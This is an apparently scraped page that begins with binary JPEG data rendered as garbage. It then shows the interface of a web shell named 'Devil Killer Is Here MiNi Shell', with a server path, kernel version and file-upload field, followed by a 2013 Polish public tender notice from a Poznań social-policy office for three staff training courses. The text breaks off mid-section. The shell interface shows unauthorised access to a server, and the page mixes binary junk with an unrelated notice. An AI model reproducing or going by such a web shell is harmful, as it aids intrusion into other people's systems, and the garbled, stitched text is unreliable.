JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130516/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130516/78045-N-2013.html

<p class="kh_header"><b>Poznań: Część 1 - Zorganizowanie i przeprowadzenie szkolenia pod nazwą: Praca z dzieckiem z FAS
Część 2 - Zorganizowanie i przeprowadzenie szkolenia pod nazwą: Kodeks postępowania administracyjnego
Część 3 - Zorganizowanie i przeprowadzenie szkolenia pod nazwą: Stres i wypalenie zawodowe</b><br>
<b>Numer ogłoszenia: 78045 - 2013; data zamieszczenia: 16.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalny Ośrodek Polityki Społecznej w Poznaniu , ul. Nowowiejskiego 11, 61-731 Poznań, woj. wielkopolskie, tel. 61 8567-300, faks 61 8515-635.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rops.poznan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Część 1 - Zorganizowanie i przeprowadzenie szkolenia pod nazwą: Praca z dzieckiem z FAS
Część 2 - Zorganizowanie i przeprowadzenie szkolenia pod nazwą: Kodeks postępowania administracyjnego
Część 3 - Zorganizowanie i przeprowadzenie szkolenia pod nazwą: Stres i wypalenie zawodowe.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część 1 - Zorganizowanie i przeprowadzenie szkolenia pod nazwą: Praca z dzieckiem z FAS
Cel szkolenia: Celem szkolenia jest wyposażenie uczestników w kompetencje niezbędne do świadczenia skutecznej pomocy dzieciom i młodzieży z zespołem FAS (Płodowy Zespół Alkoholowy) w przezwyciężaniu trudności w ich funkcjonowaniu społecznym. 

Zakres tematyczny:
I.Wprowadzenie:
Zarys rozwoju kompetencji psychospołecznych dziecka.

II.Dziecko z zespołem FAS (Płodowy Zespół Alkoholowy):
1.diagnoza dziecka z FAS - metody rozpoznawania FAS i ich praktyczne zastosowanie,
2.portret dziecka z zespołem FAS,
3.różnice pomiędzy zespołem FAS a ADHD,
4.zaburzenia fizjologiczne, charakterystyczne dla dziecka z zespołem FAS,
5.metody pracy z dzieckiem,
6.profilaktyka zaburzeń wtórnych,
7.teoretyczne i praktyczne przykłady programów socjoterapeutycznych w pracy z dzieckiem FAS.
III.Wspieranie pracy na rzecz dziecka z zespołem FAS: 
1.organizacje i instytucje działające na rzecz dzieci z FAS oraz współpraca z nimi,
2.analiza zasobów środowiska lokalnego w zakresie pomocy dzieciom z FAS,
3.rola Asystenta rodziny.

Sposób organizacji szkolenia: Wykonawcy ubiegający się o realizację niniejszego zamówienia zobowiązują się zorganizować i przeprowadzić nie więcej niż 7 edycji trzydniowych, 21-godzinnych szkoleń (przy założeniu, że jedna godzina zajęć dydaktycznych to 45 minut), dla 120 uczestników w podziale na grupy maksymalnie 20 osobowe wraz 
z zapewnieniem uczestnikom poszczególnych edycji dowozu, zakwaterowania oraz wyżywienia. 

Materiały szkoleniowe: Wykonawca zobowiązany jest zapewnić każdemu uczestnikowi materiały szkoleniowe wraz ze szczegółowym harmonogramem zajęć, w formie papierowej i na nośniku elektronicznym. Materiały szkoleniowe zostaną przekazane Zamawiającemu do akceptacji nie później niż 5 dni przed podpisaniem umowy. 

Rekrutacja i obsługa administracyjna: Współpraca z Zamawiającym w zakresie naboru kandydatów na szkolenie i tworzenie listy uczestników oznacza:
- nawiązanie kontaktu Wykonawcy z jednostkami pomocy i integracji społecznej w Wielkopolsce i na podstawie otrzymanych tą drogą zgłoszeń przeprowadzenie wstępnej kwalifikacji uczestników szkolenia oraz sporządzenie listy kandydatów na każdą edycję, 
-  przekazanie sporządzonej listy kandydatów Zamawiającemu w celu uzyskania jej akceptacji. Dostarczenie ww. listy musi nastąpić na 2 dni przed terminem rozpoczęcia każdej edycji szkolenia, 
- poinformowanie kandydatów; po otrzymaniu od Zamawiającego akceptacji zgłoszonych uczestników, 
o zakwalifikowaniu się na szkolenie. 
Wykonawca dokonuje ww. czynności posługując się formularzami przygotowanymi przez Zamawiającego 
i z wykorzystaniem danych kontaktowych udostępnionych przez Zamawiającego (baza e-mail jednostek pomocy 
i integracji społecznej w Wielkopolsce).
Zamawiający prowadzi działania wspierające działania Wykonawcy w formie ogłoszeń, listów oraz informacji na stronie internetowej. Mają one na celu promowanie szkolenia i informowanie o szkoleniu jednostek pomocy społecznej w Wielkopolsce.

Organizacja szkolenia
Dojazd: Wykonawca jest zobowiązany zorganizować dojazd uczestników na każdą edycję:
- pierwszego dnia każdej edycji z miejsca zbiórki uczestników do miejsca, w którym realizowane będzie szkolenie oraz 
- po zakończeniu edycji powrót do miejsca zbiórki. 
Zakwaterowanie: Wykonawca jest zobowiązany zapewnić zakwaterowanie uczestników szkolenia w pokojach 2 lub 1 osobowych, w hotelu trzygwiazdkowym lub ośrodku rekreacyjno - szkoleniowym spełniającym standard hotelu trzygwiazdkowego, położonym w woj. wielkopolskim, w tym w mieście Poznaniu. 
Sale szkoleniowe: Wykonawca powinien zapewnić uczestnikom szkolenia warunki do nauki w oparciu o zasady BHP. 
Wyżywienie: Wyżywienie powinno spełniać wymogi aktualnych wytycznych Instytutu Żywności i Żywienia, 
a dostarczane posiłki powinny zapewniać 100% całodziennego zapotrzebowania na energię i składniki odżywcze.
Wykonawca zobowiązany jest zapewnić uczestnikom podczas szkolenia: 
- pierwszego dnia - obiad dwudaniowy z napojem oraz kolację integracyjną,
- drugiego dnia - śniadanie, obiad dwudaniowy z napojem, kolację,
- trzeciego dnia - śniadanie, obiad dwudaniowy z napojem,
- 2 serwisy konferencyjne w każdym dniu szkolenia.

Szczegółowy opis przedmiotu zamówienia zawarty jest w Załączniku Nr 1.1. do SIWZ.
Część 2 - Zorganizowanie i przeprowadzenie szkolenia pod nazwą: Kodeks postępowania administracyjnego
Cel szkolenia: Celem szkolenia jest teoretyczne i praktyczne przygotowanie uczestników do stosowania procedur administracyjnych w instytucjach pomocy i integracji społecznej.

Zakres tematyczny:
a) Kodeks postępowania administracyjnego a ustawa  o pomocy społecznej;
b) zasady postępowania administracyjnego;
c) właściwość rzeczowa i miejscowa organu;
d) strona w postępowaniu, przedstawiciel ustawowy, pełnomocnik;
e) doręczenia pism przez organ, doręczanie pism pełnomocnikom; doręczenia szczególne i zastępcze;
f) rozstrzygnięcia w postępowaniu administracyjnym;
g) stwierdzenie nieważności decyzji administracyjnej i wznowienie postępowania;
h) dokumenty i inne dowody;
i) podjęcie, zawieszenie, umorzenie, zakończenie postępowania;
j) praktyczne rozwiązywanie zagadnień zgłoszonych przez uczestników szkolenia.

Sposób organizacji szkolenia: Wykonawcy ubiegający się o realizację niniejszego zamówienia zobowiązują się zorganizować i przeprowadzić nie więcej niż 7 dwudniowych edycji szkoleń w wymiarze 15 godzin dydaktycznych dla każdej grupy (przy założeniu, że jedna godzina zajęć dydaktycznych to 45 minut), dla 120 osób, w podziale na grupy liczące maksymalnie 20 osób, wraz z zapewnieniem uczestnikom poszczególnych edycji dowozu, zakwaterowania oraz wyżywienia.
Materiały szkoleniowe: Wykonawca zobowiązany jest zapewnić każdemu uczestnikowi materiały szkoleniowe w tym obowiązujący Kodeks postępowania administracyjnego wraz ze szczegółowym harmonogramem zajęć, w formie papierowej i na nośniku elektronicznym. Materiały szkoleniowe zostaną przekazane Zamawiającemu do akceptacji nie później niż 5 dni przed podpisaniem umowy. 

Rekrutacja i obsługa administracyjna: Współpraca z Zamawiającym w zakresie naboru kandydatów 
na szkolenie i tworzenie listy uczestników oznacza:
- nawiązanie kontaktu Wykonawcy z jednostkami pomocy i integracji społecznej w Wielkopolsce 
i na podstawie otrzymanych tą drogą zgłoszeń przeprowadzenie wstępnej kwalifikacji uczestników szkolenia oraz sporządzenie listy kandydatów do grupy, 
- przekazanie sporządzonej listy kandydatów Zamawiającemu w celu uzyskania jej akceptacji. Dostarczenie ww. listy musi nastąpić na 2 dni przed terminem rozpoczęcia każdej edycji, 

- poinformowanie kandydatów, po otrzymaniu od Zamawiającego akceptacji zgłoszonych uczestników, 
o zakwalifikowaniu się na szkolenie. 

Wykonawca dokonuje ww. czynności posługując się formularzami przygotowanymi przez Zamawiającego 
i z wykorzystaniem danych kontaktowych udostępnionych przez Zamawiającego (baza e-mail jednostek pomocy i integracji społecznej w Wielkopolsce).
Zamawiający prowadzi działania wspierające działania Wykonawcy w formie ogłoszeń, listów oraz informacji na stronie internetowej. Mają one na celu promowanie szkolenia i informowanie o szkoleniu jednostek pomocy społecznej w Wielkopolsce.

Organizacja szkolenia
Dojazd: Wykonawca jest zobowiązany zorganizować dojazd uczestników na każdą edycję:
- pierwszego dnia każdej edycji z miejsca zbiórki uczestników szkolenia do miejsca, w którym realizowane będzie szkolenie oraz 
- po zakończeniu każdej edycji powrót do miejsca zbiórki. 
Zakwaterowanie: Wykonawca jest zobowiązany zapewnić zakwaterowanie uczestników szkolenia w pokojach 2 lub 1 osobowych, w hotelu trzygwiazdkowym lub ośrodku rekreacyjno - szkoleniowym spełniającym standard hotelu trzygwiazdkowego, położonym w woj. wielkopolskim, w tym w mieście Poznaniu.
Sale szkoleniowe: Wykonawca powinien zapewnić uczestnikom szkolenia warunki do nauki w oparciu 
o zasady BHP. 
Wyżywienie: Wyżywienie powinno spełniać wymogi aktualnych wytycznych Instytutu Żywności i Żywienia, 
a dostarczane posiłki powinny zapewniać 100% całodziennego zapotrzebowania na energię i składniki odżywcze.
Wykonawca zobowiązany jest zapewnić uczestnikom podczas szkolenia: 
-  pierwszego dnia - obiad dwudaniowy z napojem oraz kolację,
- drugiego dnia - śniadanie, obiad dwudaniowy z napojem,
- 2 serwisy konferencyjne w każdym dniu szkolenia, 
- zorganizowanie kolacji integracyjnej podczas pierwszego dnia szkolenia.

Szczegółowy opis przedmiotu zamówienia zawarty jest w Załączniku Nr 1.2. do SIWZ.

Część 3 - Zorganizowanie i przeprowadzenie szkolenia pod nazwą: Stres i wypalenie zawodowe
Cel szkolenia: Celem szkolenia jest nabycie praktycznych umiejętności rozpoznawania objawów nadmiernego stresu, poznanie technik radzenia sobie ze stresem oraz zasad dbania o równowagę psychofizjologiczną w warunkach przepracowania.
Zakres tematyczny:
a) Stres jako czynnik zaburzający równowagę psychofizyczną.
-  fizjologia czasu - rytmy dobowe, kwartalne, roczne oraz ich wpływ na sprawność psychofizyczną i możliwości intelektualne człowieka,
-  autodiagnoza własnego stanu: zmęczenie, przemęczenie, stres, wypalenie zawodowe,
-  stresopochodne procesy psychologiczne i fizjologiczne,
-  etapy reakcji stresowej,
- stres eufunkcjonalny i dysfunkcjonalny - poziom stresu a skuteczność funkcjonowania,
- stres doraźny a stres przewlekły,
- zarządzanie własną energią i jej regeneracja.
b) Rozwijanie w sobie odporności na stres
-  fizjologiczna odporność - dieta, kondycja fizyczna,
- psychologiczna odporność - zbalansowany styl życia, asertywny styl bycia.
c) Techniki kontroli stresu i rozładowujące napięcie
- zmiany w systemie przekonań i nastawieniu do świata,
-  zarządzanie czasem - redukcja stresu poprzez zwiększenie efektywności pracy,
- sztuka odpoczynku - nauka metod relaksacji,
- fizyczna redukcja stresu i głębokie oddychanie, kontrola napięcia mięsni,
- przegląd metod (np. technika relaksacji Jacobsona i trening autogenny Schultza),
- metody konstruktywnego reagowania na sytuacje stresowe,
- samo-hipnoza i autosugestia - fakty i mity.

Sposób organizacji szkolenia: Wykonawcy ubiegający się o realizację niniejszego zamówienia zobowiązują się zorganizować i przeprowadzić nie więcej niż 11 edycji trzydniowych, 21-godzinnych szkoleń (przy założeniu, że jedna godzina zajęć dydaktycznych to 45 minut), dla 200 uczestników w podziale na grupy maksymalnie 20 osobowe wraz 
z zapewnieniem uczestnikom poszczególnych edycji dowozu, zakwaterowania oraz wyżywienia. 
Materiały szkoleniowe: Wykonawca zobowiązany jest zapewnić każdemu uczestnikowi materiały szkoleniowe wraz ze szczegółowym harmonogramem zajęć, w formie papierowej i na nośniku elektronicznym. Materiały szkoleniowe zostaną przekazane Zamawiającemu do akceptacji nie później niż 5 dni przed podpisaniem umowy. 

Rekrutacja i obsługa administracyjna: Współpraca z Zamawiającym w zakresie naboru kandydatów na szkolenie i tworzenie listy uczestników oznacza:
- nawiązanie kontaktu Wykonawcy z jednostkami pomocy i integracji społecznej w Wielkopolsce i na podstawie otrzymanych tą drogą zgłoszeń przeprowadzenie wstępnej kwalifikacji uczestników szkolenia oraz sporządzenie listy kandydatów do grupy, 
- przekazanie sporządzonej listy kandydatów Zamawiającemu w celu uzyskania jej akceptacji. Dostarczenie ww. listy musi nastąpić na 2 dni przed terminem rozpoczęcia pierwszej edycji, 
- poinformowanie kandydatów, po otrzymaniu od Zamawiającego akceptacji zgłoszonych uczestników, 
o zakwalifikowaniu się na szkolenie. 
Wykonawca dokonuje ww. czynności posługując się formularzami przygotowanymi przez Zamawiającego 
i z wykorzystaniem danych kontaktowych udostępnionych przez Zamawiającego (baza e-mail jednostek pomocy i integracji społecznej w Wielkopolsce).
Zamawiający prowadzi działania wspierające działania Wykonawcy w formie ogłoszeń, listów oraz informacji na stronie internetowej. Mają one na celu promowanie szkolenia i informowanie o szkoleniu jednostek pomocy społecznej w Wielkopolsce

Organizacja szkolenia
Dojazd: Wykonawca jest zobowiązany zapewnić zorganizowanie dojazdu uczestników na każda edycję:
- pierwszego dnia z miejsca zbiórki uczestników szkolenia do miejsca w którym realizowane będzie szkolenie oraz 
- po zakończeniu szkolenia powrót do miejsca zbiórki. 

Zakwaterowanie: Wykonawca jest zobowiązany zapewnić zakwaterowanie uczestników zjazdów w pokojach 2 lub 1 osobowych, w hotelu trzygwiazdkowym lub ośrodku rekreacyjno - szkoleniowym spełniającym standard hotelu trzygwiazdkowego, położonym w woj. wielkopolskim, w tym w mieście Poznaniu. 
Sale szkoleniowe: Wykonawca powinien zapewnić uczestnikom szkolenia warunki do nauki w oparciu o zasady BHP. 

Wyżywienie: Wyżywienie powinno spełniać wymogi aktualnych wytycznych Instytutu Żywności i Żywienia, 
a dostarczane posiłki powinny zapewniać 100% całodziennego zapotrzebowania na energię i składniki odżywcze.
Wykonawca zobowiązany jest zapewnić uczestnikom podczas szkolenia: 
- pierwszego dnia - obiad dwudaniowy z napojem oraz kolację,
- drugiego dnia - śniadanie, obiad dwudaniowy z napojem, kolacja,
- trzeciego dnia - śniadanie, obiad dwudaniowy z napojem,
- 2 serwisy konferencyjne w każdym dniu szkolenia, składające się z kawy, herbaty, wody mineralnej, soków, owoców; np. jabłko lub banan, wyrobów cukierniczych,
- zorganizowanie kolacji integracyjnej pierwszego dnia szkolenia

Szczegółowy opis przedmiotu zamówienia zawarty jest w Załączniku Nr 1.3. do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.11.00.00-4, 55.12.00.00-7, 55.30.00.00-3, 60.10.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Ustala się wadium w wysokości: 
dla Części 1 - 3 400,00 zł (słownie: trzy tysiące czterysta złotych 00/100), 
dla Części 2 - 2 300,00  zł (słownie: dwa tysiące trzysta złotych 00/100),
dla Części 3 - 5 700,00  zł (słownie: pięć tysięcy siedemset złotych 00/100). 
Wadium wnosi się pod rygorem wykluczenia z postępowania przed upływem terminu składania ofert, w jednej lub kilku z niżej wymienionych form:
w pieniądzu, przelewem na rachunek bankowy:
BGŻ S.A. OO Poznań
Rachunek nr 60 2030 0045 1110 0000 0234 9820
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
gwarancjach bankowych;
gwarancjach ubezpieczeniowych;
w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620).
Jeżeli Wykonawca wnosi wadium w formie pieniężnej, wymagana kwota powinna znajdować się na rachunku zamawiającego przed upływem terminu składania ofert.
W przypadku pojawienia się wątpliwości co do wniesienia wadium w formach niepieniężnych wskazane jest zgłosić się do pani Justyny Sobieskiej nr tel. (61) 856-73-41, w celu uzgodnienia trybu potwierdzenia wniesienia. Przyjęcie przez Zamawiającego dokumentu nie jest jednoznaczne z poprawnością złożonego wadium. 
Wykonawca, którego oferta została wybrana, traci wadium wraz z odsetkami na rzecz Zamawiającego zgodnie z przesłankami art. 46 ust. 5 ustawy, zaś pozostali Wykonawcy zgodnie z przesłankami art. 46 ust. 4a ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunki udziału w postępowaniu, jeżeli: 
w odniesieniu do warunku wskazanego  Wykonawca złoży oświadczenie 
o spełnianiu tych warunków (Załącznik Nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w odniesieniu do warunku wskazanego  Wykonawca wykaże, iż  okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał z należytą starannością, a w przypadku świadczeń okresowych lub ciągłych również wykonuje usługi polegające na przeprowadzeniu co najmniej:
w zakresie Części 1:
- pięć odrębnych szkoleń, tj. zrealizowanych na podstawie oddzielnych umów, w wymiarze czasowym minimum 20 godzin każde, w zakresie tematycznym dotyczącym pracy z dzieckiem z zaburzeniami zachowania lub socjoterapii dzieci i młodzieży.
- dwa odrębne, tj. zrealizowane na podstawie oddzielnych umów, minimum dwudniowe szkolenia wraz z zapewnieniem uczestnikom zakwaterowania i wyżywienia, każde o wartości co najmniej 50.000,00 złotych brutto.
Wykazane szkolenia mogą spełniać oba ww. warunki.
w zakresie Części 2:
- cztery odrębne szkolenia, tj. zrealizowane na podstawie oddzielnych umów, w wymiarze czasowym minimum 15 godzin każde, w zakresie Kodeksu postępowania administracyjnego.
- dwa odrębne, tj. zrealizowane na podstawie oddzielnych umów, minimum dwudniowe szkolenia wraz z zapewnieniem uczestnikom zakwaterowania i wyżywienia, każde o wartości co najmniej 30.000,00 złotych brutto.
Wykazane szkolenia mogą spełniać oba ww. warunki.
w zakresie Części 3:
- dwa odrębne szkolenia, tj. zrealizowane na podstawie oddzielnych umów, w wymiarze czasowym minimum 21 godzin każde, w zakresie tematycznym dotyczącym rozwoju, doradztwa osobistego lub zawodowego, zarządzaniem zasobami ludzkimi lub organizacją.
- dwa odrębne, tj. zrealizowane na podstawie oddzielnych umów, minimum dwudniowe szkolenia wraz z zapewnieniem uczestnikom zakwaterowania i wyżywienia, każde o wartości co najmniej 95.000,00 złotych brutto.
Wykazane szkolenia mogą spełniać oba ww. warunki.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w odniesieniu do warunku wskazanego Wykonawca wykaże, iż dysponuje odpowiednim potencjałem technicznym tj.: stroną internetową, adresem e-mail, sprawnym faksem, sprawnym telefonem.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponuje osobami, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami tj.:
w zakresie Części 1:
- dysponuje co najmniej dwuosobowym zespołem specjalistów, z których każdy posiada:
a)	wykształcenie wyższe magisterskie, 
b)	doświadczenie zawodowe w pracy z dziećmi  z zaburzeniami zachowania: minimum pięcioletnie,
c)	doświadczenie szkoleniowe: minimum 200 godzin dydaktycznych szkoleń o tematyce dotyczącej pracy z dzieckiem z zaburzeniami zachowania,
-   dysponuje co najmniej dwoma osobami, które:
 a)  będą koordynować działania i obsługę w zakresie rekrutacji uczestników   szkolenia, 
 b)  będą sprawowały opiekę nad grupą w trakcie i na miejscu szkolenia,
c)  pozyskają i rzetelnie przygotują dokumentację projektową.
w zakresie Części 2:
- dysponuje co najmniej dwuosobowym zespołem specjalistów, z których każdy posiada:
a)  wykształcenie wyższe magisterskie z zakresu prawa lub administracji,
b) doświadczenie szkoleniowe: przeprowadzone minimum 300 godzin lekcyjnych szkolenia  z zakresu  Kodeksu postępowania administracyjnego ,
c)  udokumentowane, minimum trzyletnie doświadczenie zawodowe - praca w administracji publicznej, 
-  dysponuje co najmniej dwoma osobami, które:
a) będą koordynowały działania i obsługę w zakresie rekrutacji uczestników szkolenia, 
b) będą sprawowały opiekę nad grupą w trakcie i na miejscu szkolenia,
c) pozyskają i rzetelnie przygotują dokumentację projektową
w zakresie Części 3:
- dysponuje co najmniej dwoma specjalistami, z których każdy posiada:
a) wykształcenie wyższe magisterskie,
b) doświadczenie zawodowe w pracy psychoterapeutycznej: minimum 2 lata,
c) doświadczenie szkoleniowe: przeprowadzenie minimum 200 godzin lekcyjnych z zakresu rozwoju, doradztwa osobistego lub zawodowego.
-  dysponuje co najmniej dwoma osobami, które:
 a) będą koordynować działania i obsługę w zakresie rekrutacji uczestników szkolenia, 
 b) będą sprawowały opiekę nad grupą w trakcie i na miejscu szkolenia,
c) pozyskają i rzetelnie przygotują dokumentację projektową.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w odniesieniu do warunków wskazanych  Wykonawca złoży oświadczenie o spełnianiu tych warunków (Załącznik Nr 3 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
